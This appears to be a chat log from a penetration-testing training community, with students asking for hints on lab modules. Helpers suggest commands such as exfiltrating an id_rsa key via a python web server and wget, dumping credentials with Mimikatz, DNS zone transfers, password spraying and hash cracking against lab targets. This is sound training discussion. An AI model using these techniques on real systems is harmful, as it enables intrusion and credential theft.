I can't seem to figure out what to do on it. I read the module several times to determine my next action but I'm struggling. Now, I'm not sure if I need to learn other modules first before I can answer it and maybe I'm not taking the modules in correct order.
Thanks... I finally understood what the question means...
I was actually expecting that after reading the content I should be able to answer the challenges at the end. But that is not what I'm experiencing now. Need advice.
ok, so you got access to user2 and have a shell yes? now you need to find a way to access the root user.
this is enumeration, pure and simple. start a checklist. every time you make progress on anything: got a shell? enumerate. new box? enumerate.
in the module there are 10 things to look for that will help.
now that you have user2, start over. what can user2 access that user1 couldn't?
add each of those to the checklist.
thanks this seems to be a good strat. Ok I will start again with this strat. Thank you!
Hey is there anyone I can msg about my payload I'm using for Advanced Command Obfuscation?
Currently banging my head against a wall over Zone Transfers in the Information Gathering - Web Edition module... Any help with this would be greatly appreciated.
why is my kernel version not in the format they ask for?
what is it
6.0.12 is what parrot sec tells me when i put in uname -v
What is not working and what have you already tried?
what format they asking for
1.00.1 or something
but it doesn't like it
rip idk
Well, it's not that things aren't working, it's that there is a total disconnect when it comes to understanding the dig and nslookup outputs and how it was determined that there are 2 zones...
well was worth a try
What exactly do you not understand?
How does this output == 2 zones
This is not directly visible on this output
I'm assuming you're coming up with two zones based on the SOA entry, right?
hello, I am at the first step password attacks/network service. I am supposed to "Find the user for the WinRM service and crack their password."
I tried using crackmapexec with the password list xato....1000.txt and the top-usernames-shortlist.txt in Seclists...
Are there better lists I didn't find?
Funny enough, it was a total guess that happened to be correct. The Serial Number in the results is 2 and that just so happens to be the answer.
Your assumption makes sense and I appreciate the cloudflare link.
I'm remembering now that each can only have a single SOA, so that would make sense for those 2 to be it
My assumption comes from the fact that many students make this mistake.
By the way, the blue marked one is a mail address
Yea, I discovered that in some other output
The main reason I haven't touched the one marked in blue is because it was found to be a mail address
I'll test that out
Thanks for the help! I was finally able to complete that section.
hello how can I copy the id_rsa from a user to the attack machine?
scp, wget, nc, smbclient, ftp
but why do you want to do that is the question
I'm trying to complete a task for privilege escalation and I'm completely lost
do you have rce on the target?
sorry I'm totally new, what is RCE? I mean I'm able to get in to the remote machine and just trying to escalate privilege from user2 to root
yes user2
So the module should have talked about how to transfer files
One of them being python -m http.server <port> which starts a webserver on that port
Run that on the target machine in the directory where the id_rsa is.
no it did not, that's why im struggling
In another terminal window you can use wget http://IP:port/id_rsa
ill try this one
It most likely did in a different section
But you might not have taken notes on it
yeah, that's what I'm thinking, that maybe I jumped to this module too early and should've taken a module that can prepare me for this
this is just getting started module though
Sections are not the same as modules. I'm not at my computer to double check for you but I'm fairly certain it talks about transferring files
Each module has several sections in it
You might use information from a previous section in the module at a later point
ok will back track. thanks!
There is a whole module as well regarding file transfers
Another way is cat id_rsa and copy the whole thing into a text file
i did this
i don't know how I should proceed after lol
You also need to make sure the rsa permissions are correct (iirc chmod 700)
Again the module itself talks about RSA permissions
I'd definitely reread everything and take notes
It's not a bad thing to take notes
the gospel
well to be fair, I'm taking notes. It's just that I'm not seeing the things I'm expecting to see hehe
It's bad to just copy/paste instead of rewriting info in your own words (aside from commands)
right after I enter vim id_rsa
it will direct me to the editor (i think it's expected)
YES
but where should I put the chmod after?
Ctrl+shift+v to paste into text editor
on that visualization it looks like you can do it step by step
Yes
you know what i mean?
After entering into the text editor and saving
:wq
For vim
And ssh syntax is ssh <user>@<IP> -i id_rsa
Also
and I get that, but it is not shown in the writeups
It's something that you can learn and Google
There are a good chunk of examples where the module gives you 90% of the info to learn and 10% requiring extra research
yeah i think that's the way they designed it
Learning how to research and look things up is a useful skill
The reason a writeup might omit something is if they believe it to be common knowledge
Also for modules that are t1+ you won't (or shouldn't) find any writeups
As writeups for any non-fundamental (tier-0) content is strictly prohibited
But I will say: info on how to complete modules is almost always within the module
If you want I can dm you tomorrow how I boil down command syntax
that would be awesome, but like what you've said the answer should be just somewhere
just need to be patient
Learning and taking good notes is a skill. Some people it's easier than others
It's just in how you naturally process information. Alongside that writing things down to help you reinforce it
Also you should be able to piece together known information with unknown info to ask better questions to google
Using <tool> to do <job>
Because a LOT of tools are REALLY well documented
so I figured it out lol
so funny that Transferring Files section comes after the Privilege Escalation topic lol
Eh it's because it's more meant to be "this is the 'hardest' way if you have no other options"
I figured it was not because of "transferring file", I was not using the correct user after gaining the rsa. I'm still using user2 and trying to go to root from it, instead of using root directly to ssh lol
that's fun
got the Flag! wheeeew
Gz
Hey all, I'm doing the third question of the Information Gathering - Web - Skills assessment where the question is: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host? | I get a status code of 302 indicating that the URL has temporarily been moved to another location. What do I do now?
it's all good, I just curled the original URL hoping that they would be hosted on the same server and it worked
hi guys i am having trouble with this:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.
basically i am putting the malicious file in the shared folder in c:\ but the sccm_svc user won't access the folder so i am stuck
Hello. I'm stuck on the first step of the Windows Privilege Escalation Skills Assessment - Part I. I don't know which user to connect to the target as. I do an nmap and see open RDP port 3389. Even with the --script rdp-ntlm-info and rdp-enum-encryption I get more information, but I can't find which user to use to connect to xfreerdp. Can someone help me please?
Hi I'm stuck at the last section of the footprinting module in DNS section.
I don't understand how to find the answer
what commands you tried
Hello. I need help with the skill assessment on Hacking WordPress. For the first question, I tried to enumerate with WPScan but it ends up saying that the target doesn't appear to be running WordPress.
dig axfr internal.inlanefreight.com @<dns server>
got some results but none end in 203
tried list brute forcing, same issue
So after zone transfer you can do another axfr on the found subdomains.
and add them to /etc/hosts
The only other subdomain I found axfrable(sorry...) is internal.
and don't I need to have the IP to add them to the hosts?
you can add them in the same line with a space between the subdomains
nameserver IP same
Oh ok... I still don't see how it leads me to the answer tho
after you identify all subdomains with dig and add them to /etc/hosts, you can brute force them
can't you do that either way?
I don't think you can brute force if not in hosts file
Why would you add subdomains to /etc/hosts?
The computer file hosts is an operating system file that maps hostnames to IP addresses. It is a plain text file. Originally a file named HOSTS.TXT was manually maintained and made available via file sharing by Stanford Research Institute for the ARPANET membership, containing the hostnames and address of hosts as contributed for inclusion by me...
In this task you will have a DNS server that will resolve the domains
oh ok my bad.
Then they are only needed in the hosts file in the case that they are vhosts
No, not necessarily
You only need the hosts file if
A) no DNS server is available for the resolution.
B) you want to manipulate the result from the DNS server.
yeah makes sense
The module Footprinting in the section DNS provides you with a DNS server as a target. This takes over the task as authoritative DNS server for the top-level domain .htb.
Ok so... I still can't find the answer... this is getting a bit funny
I have sent you a DM
I do not want to spoil the complete task here
Hey, I'm trying to complete the last section, Knowledge Check of the Getting Started module. I need a little hint. I got the admin creds, logged into the admin panel and found the right exploit. Minor spoiler ahead; ||the upload file button that I need to use for the exploit uses Adobe Flash Player, which is as we all know deprecated.|| Is there any way around this, or is this box broken? How would I approach that?
I guess there is an alternative path using metasploit, but is there a way to complete it using the path I described above?
Hi all, I am trying to find that admin password in the footprinting module, imap section. I am logged into the server and none of the commands work for me, I keep getting unknown command unless I put 'tag' in front of them. I can see the list of directories but I am not sure how to interact with them since all I am getting is error messages like "tag BAD Error in IMAP command FETCH: Invalid arguments (0.001 + 0.000 secs)."
hi, i'm stuck at question 2 of the password token module. i decoded the token and replaced htbuser with htbadmin, then hexed and base64'd it. when i use that token to sign in as htbadmin it doesn't work. what am i doing wrong?
Hi guys, am I the only one who is experiencing problems when accessing the boxes at the end of the module?
Example:
I start the htb virtual machine and also start the target, but when I then run the (correct) commands they don't work.
Can anyone tell me why? Maybe I should be subscribed?
solved
where is python3 located in the pwnbox?
check with which python3
Please provide more context: what command are you running and what errors are you getting @rustic sage
Has anyone used the CRT pathway and taken the CRT recently?
I tried to enumerate pages (gobuster) & params (FFUF), and I found a couple of plugins. I submitted the answer (e.g. contact-form-7), but it's not correct.... May I know a hint for how I can find the correct plugin? I tried viewing the source code, fuzzing dirs and params, reading readme.txt...
M:WordPress - Discovery & Enumeration
Q:Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
in the module introduction to network traffic analysis, on the tcpdump fundamentals section, Question 2: "Were absolute or relative sequence numbers used during the capture?" Is that NOT a yes or no question? i mean even the hint asks a yes or no question, but neither yes, no, maybe, absolute sequence, nor relative sequence work. I'm much confused
Does anyone know why my dashboard shows 70% complete in general, but I've completed every General module?
No idea how this figure is calculated
Currently I have still one General and one Defensive module pending
All General finished. 2 Defensives outstanding.
General modules: Learning Process, Intro to Academy, Linux Fundamentals, Introduction to Bash Scripting, DNS Enumeration Using Python, Introduction to Networking, Web Requests, Windows Fundamentals, Introduction to Active Directory, Introduction to Web Applications, Intro to Network Traffic Analysis, Intro to Assembly Language, Setting Up, Introduction to Python 3, Testing Process, MacOS Fundamentals, Bug Bounty Hunting Process, Documentation and Reporting, Introduction to Windows Command Line.
@acoustic owl maybe there are more modules to be released until 100% are reached.
Were absolute or relative sequence numbers used during the capture?
Yes, I think so, that more modules come
But new modules are always coming...
You will never stop learning
I know. If someone told me about that back at school.... may never have gone into computers >.<
Now its too late. Far too late.
yes
That's not a yes or no question.
^
it's asking A or B
were Absolute(A) or Relative(B) sequence numbers used
because it will always capture A and B, but specifically which ones were used is the actual question
If you're struggling to answer that question on whether it's absolute or relative, I'd suggest going back and re-reading the material.
it's more of a comprehension question than a material question
like if yes/no isn't the answer then make sure you understand what you're being asked
I see the S flag being used so the numbers are being changed over.
re-read the material then and figure out what you're missing or the crucial part to help you answer the question
It's case sensitive, that's why i couldn't get it. I knew the answer and tried copying and pasting from the material, which is why i got so confused when it didn't work. I didn't realize that capitalization would be a problem
Thanks everyone for helping
I'm struggling some with the final assessment within the File Upload Attacks.
I can get files past the filter, read the source code for the PHP files, etc.
The issue I'm seeing is that if it's base64 encoded then it can't execute it as PHP and if svg it appears you can read files but can't do PHP code. Is there something I am missing here?
@west canopy case insensitive answers when?
hi guys i am having trouble with this:
windows priv escalation:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.
basically i am putting the malicious file in the shared folder in c:\ but the sccm_svc user won't access the folder so i am stuck
any ideas??
I mean it wouldn't hurt to specify they need to be capitalized especially in an intro level module.
yes that's why I pinged one of the people that actively hotfix the modules when there's an issue xD
I go with the approach, that if the question gives specific prompts for what the answers should be, then you should make them match how they've stated them.
sorry i just might've given an answer away hopefully that got deleted
if it's a fundamental module: they are generally more lax with 'spoilers' as it's a fairly simple question and sanity checking doesn't hurt
i'm having an issue on the module for "Login Brute Forcing" on the "Skill assessment - Website" where it is super slow to brute force; it is estimating it will take 36 hours, which i'm sure is not the point of the module
not sure if it's just my wordlists or what
thanks
are you sure there wasn't a username/password file provided in the resources section? (haven't done this module)
Thanks @fathom pendant. You are very appreciated!
o7
For all his work, MarcieLee actually deserved the tag "HTB Community Contributor" as well. How can I nominate him?
To be perfectly honest, you both deserve to be our Community Contributors
Sorry for asking again...
I used aggressive plugin scan... but I can not find any correct answer... Is it possible to solve this question?
M:Attacking Common Applications: WordPress - Discovery & Enumeration
Q:Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
i'm not sure if there is any relation to the previous sections in the module, like if i reuse a username? all the posts on the forum say it should be incredibly quick to crack, not take 36 hours lol
for sure it is not 36 hours to get to the credentials
use the wordlists from the cheatsheet
yea thats what i did
i mean there's 3 but i tried all of them
they are all pretty long idk
take a look at your command
estimated time does not always equate to exact time either :)
you can even try using wireshark to see if everything is ok
if username and password are high up on the list you'll get it well before the 36 hours
okay ill let it run for a while then
what's the full command you're running (not sure if the screenshot is cutoff or it's wrapped text
I see in your command you're using -S 3190, are you trying to connect to port 3190? if so it's actually -s; -S is SSL connection
nvm
i misread
hey i'm on the password attacks module, section passwd, shadow and opasswd, and they only showed how u open the files and read em and crack
but i don't have any perms on will's account to read them lol
what am i supposed to do
enumerate
^ there is a folder that has the shadow and passwd files for easy transfer
wrapped text
it shows the full thing
still goin
huh, like on linux or just on this machine?
let him enumerate marcilee
on that machine specifically it's not in the default location
yeah i found it
however it doesn't hurt to look
rule #1 always enumerate
enumerate -> determine if need to escalate -> find escalate path -> repeat
does it take long to crack?
so ik if i did it good or it just takes this long xd
considering the full /etc/passwd file is there you might need to go in and edit any non-user accounts out of the unshadowed file
up to you but this module does a fair bit of reuse of previously gained credentials
okay then ill leave it
but there are a handful of non-user accounts in there that aren't really useful :)
usually not if you're using the mutated list from the provided resources
im using rockyou.txt
that's what they used in the module
so i thought that should be it
not everything is gonna be 1:1
from what I remember pass attacks after it tells you how to make the mut_password.list uses that list
yeah
hello. maybe someone can help me. i can't open the target (ip in questions), the browser shows a white screen and a 404 error in devtools, resetting the target doesn't help. this morning all was good
Is it a Docker container?
If not, are you connected to the Academy VPN?
Try it also once from the PwnBox
tried, the same
Password Attacks >>> Network Services >>> Any clues as to what user list and password list I should be using? Apparently the resource list provided with the module will not get me there
try rockyou
For both the user and password list? - Seems like this will take a week to run
the reading section should be more than enough to do it
just read it again and try to replicate it
The reading section used the user and password list from the module resources and it didn't seem to cut it. I'll go back and try again
That is just crazy
copy and paste the same commands twice
two diff results
thanks for your time!
doing AD: DCSync , I tried ssh into 172.16.5.225 with the right creds. and it gives wrong password, and mimikatz doesn't seem to be working as wanted
any help ?
you are welcome
dm me.
hey im on password attack pass the hash section and the question is "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account? "
they didn't mention dumping the hashes in this section?
Is the target given to you in the form of IP:PORT; if so you need to put http://IP:PORT into the browser
not JUST the IP
it does; take a close look at the example from Mimikatz
I believe it was taught earlier on though. You can simply refer to that
yeah, but i get error
it says that "sekurlsa::pth" module doesnt exist
Try privilege::debug first
i did
hmm
could you help me with this question? "What is the 2021 OWASP Top 10 classification for this vulnerability?"
OWASP Top 10:2021
Think about the type of attack it is and match it with that classification
you have put your entire command between quotes
so maybe that's the issue?
you're talking about everything after the pth part yeah?
first character is "
yes and it ends with a " it looks like the right half of the terminal was not included in the screenshot but screenwrap shows an ending "
at least that's what it appears to me
the hint is dash but nothing from this list has a dash
yup, same here
and it ends with 'n'
Look how they're classified A##:2021-<Classification>
how is it A10? is it server-side request?
yeah
are you SURE
i think so
What do you do to perform the exploit?
Just take a minute to walk yourself through the attack
Ah, I don't quite understand it
I'm trying to basically tell you: you shouldn't guess, you should be sure
yeah I get your point, but I'm not sure, maybe I should get back to the previous lessons
"try harder" might suggest hammering the tree with a hammer but I would suggest taking a break
i did
put it between quotes
try without please
right
i fixed it
But I still don't get how to extract the hashes with Mimikatz?
Because I didn't see it anywhere in the module
try:
sekurlsa::logonpasswords
thanks!!
pleasure
Is it psd1 or ps1?
dir where?
check the path
Iirc that's where they're located at
You understand that when you are specifying .\ in that format, it means call the local directory location, right? So you need to be in the directory with the file to use the command in that format.
I know, still not working
I am currently having issues with odat.py in the footprinting module. When I try to use odat.py, I get the following error: "┌──(root㉿kali)-[~/odat]
└─# ./odat.py -h
Traceback (most recent call last):
File "./odat.py", line 5, in <module>
from libnmap.parser import NmapParser
ImportError: No module named libnmap.parser"
Did you compile it as shown from the module?
I messed up one part and thought it was just a mistake and now I can go back and run the proper commands, but it may have screwed stuff up
is there a way to revert all changes I just made?
¯\_(ツ)_/¯
If you're using the HTB box, just reset everything
I am on my own VM...
Looks like I may be learning my lesson to use the snapshot feature of VMware when I download new things... 
If you're on kali odat is in its repository too. Could attempt to bypass the setup script and straight install the program. Might be a little cleaner and can always apt purge that thing if it gets wonky.
Hey all, I'm trying to run mount -t nfs <ip>:/ /mnt/nfs -o nolock but I get the following error: mount.nfs: Operation not permitted
I am running as root; does anyone have any idea what it could be?
Don't run as root, run with sudo
You should almost never be running things as root
@fathom pendant I'm inside a container; also, I tried it using sudo as a normal user
mount -a [-t type] [-O optlist] (usually given in a bootscript) causes all filesystems mentioned in fstab (of the proper type and/or having or not having ...
¯\_(ツ)_/¯
What module as well?
Are you sure you need to add the :/ after the IP?
It could be mount -t nfs ip:/<share filename>
let me try
mount.nfs: remote share not in 'host:dir' format
sorry, anyway, it's footprinting > nfs
Are you able to create a different directory and try mounting it to that?
I tried it already
You need to showmount -e (IP) then attempt to mount one of those shares. You're attempting to mount the root directory. lol
I don't recall having many issues
also did...
I do have notes at home on my syntax but I'm at work. I'll be home in like 8-9 hrs
DM me
I was running my Kali as root since I did the TCM course; should I stop doing that?
Eh, if it's a Kali VM it's kinda whatever
But more and more stuff whines about being run as root when it's not needed
^
I'm running a Kali container; can't find a good solution for running VMs on Apple silicon
QEMU, I heard, is good
Yes, UTM uses QEMU but it was quite slow; not sure if it was a UTM or QEMU issue
yep!
VMware Fusion? I thought they just got M1 support. Could be wrong
Btw, my issue got solved when I used Parrot, thanks
Isn't it paid?
Good question. I have a license from work. I thought they had a free deal too
VMware does have a free version
time to convince my work I need a license
Player, right?
Not sure how good it is
not for fusion I think, but I could be wrong
Yes
I used the free one for windows and linux, it's great
Idk the differences
I found the networking in Player... subpar for shit like malware.
There's also parallels.com, but I never tried it so idk
I've heard decent things about parallels
I have M1 too, and just got frustrated with the options and now hop back and forth between Windows and Mac.
^ Apple itself is just frustrating to work around
Buy Apple stuff (expensive) > now you need to buy more expensive stuff so common things work
When it works it's awesome. But when it doesn't, there's a dongle for that
Apple + any non-apple product is iffy
That dongle cost about the price of a new phone
60 bucks. SIXTY BUCKS for a 5 inch connector.
Straying off-topic here
But in general if you are using virtualization on M1 architecture you generally need to be using the Architect editions of Linux OS
Could you help me please with the module of firewall in nmap? I can't resolve the medium lab. I tried to use decoy with nmap but that does not work
So I reinstalled Kali and downloaded everything again, followed the steps in the module EXACTLY, and I was still getting the same error in the footprinting module with odat. So now I am reinstalling and setting things up to that point and taking a snapshot. I will finish this module and then play around with installing odat again because this has been frustrating... and I see that people have been having this issue since the module update recently. Any advice???
sudo apt install odat?
That's what I did
When I do that, everything works, except for the file upload at the end of the module. So for now I will set it up to that point and leave it be I guess. Take a snapshot and move on then try again tomorrow morning.
you should just enumerate silently if I remember correctly
For AD Enumeration and Attacks Skill Assessment 2 Q4, I know I have to password spray using Jsmith to make a user list and W*****1, but it still won't go through
Who can help me with Skill Assessment 2 AD, because I don't know how to pass :))
I need to find the CT**** hash, but I ran Responder on both machines, MS01 and SQL, using the Administrator account and the mssqlsvc user, and cannot find the hash
How'd ya get Responder working on a Windows box?
Use rpcclient and enumerate all users, make a list with just the names of the users, without all the other characters, and spray with W**1.
Good luck!
It's in the Tools folder
Review the section notes
It mentions a similar tool specifically to be run from Windows
Ooo, yeah I forgot about it :))
also patience as well
easy to give up too early
and then just think its not working when it really is
Try CME with X flag and play around using another user's low privilege credentials.
hello, I am at the first step password attacks/network service. I am supposed to "Find the user for the WinRM service and crack their password."
I tried using crackmapexec with the password list xato....1000.txt and the top-usernames-shortlist.txt in Seclists...
Are there better lists I didn't find?
There is a username and password list file in resources. Iirc there's also a service running that lets you verify usernames to save time
thank you, I never noticed this resource section....................
The custom.rule is also what will be used to mutate the password.list from that section
great thank you again
Many modules that have you attempting bruteforcing will either give you a list, or will greatly infer which list to use, such as rockyou
Say, why is Nmap slow at times? I am trying to do a scan with Kali Linux for a school assignment... please and thanks all
which module is this for
Hey madfox, it's just for my ethical hacking course that I am doing... thanks for the reply
right now as we speak i am doing python network programming for network defense
this channel is for module discussion only
Oh k, I will do that, and thanks madfox